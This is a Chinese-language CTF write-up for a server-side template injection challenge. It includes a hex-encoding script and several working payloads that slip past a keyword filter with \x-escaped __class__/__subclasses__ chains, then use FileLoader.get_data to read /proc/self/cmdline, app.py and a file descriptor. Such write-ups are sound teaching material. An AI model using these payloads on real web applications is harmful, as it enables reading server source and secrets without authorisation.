- 题目已经告诉是SSTI模板注入了
- 测试一下
- 做题时用""发现了过滤 fuzz一下
- 过滤了很多东西
- 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换
- 附上自己写的python脚本
code = "/proc/self/fd/1"
ssti = ""
length = len(code)
for i in range(length):
ssti += "\\x" + hex(ord(code[i]))[2:]
print(ssti)
- 将下面内容转化为16进制
__class__:\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f__base__:\x5f\x5f\x62\x61\x73\x65\x5f\x5f__subclasses__:\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f- 构造payload:
{
{
[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()}}
- 接下来就是选可用的对象和调用函数了
- 我原本想用catch_warnings但是到最后的部分想起来.被过滤了不知道怎么调用了
- 看了一下wp
- 调用了这个类
<class '_frozen_importlib_external.FileLoader'>
- payload:
{
{
[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"/proc/self/cmdline")}}
- 发现现在运行的程序时app.py
- payload:
{
{
[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"app\x2epy")}}
{
{
[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"/proc/self/fd/3")}}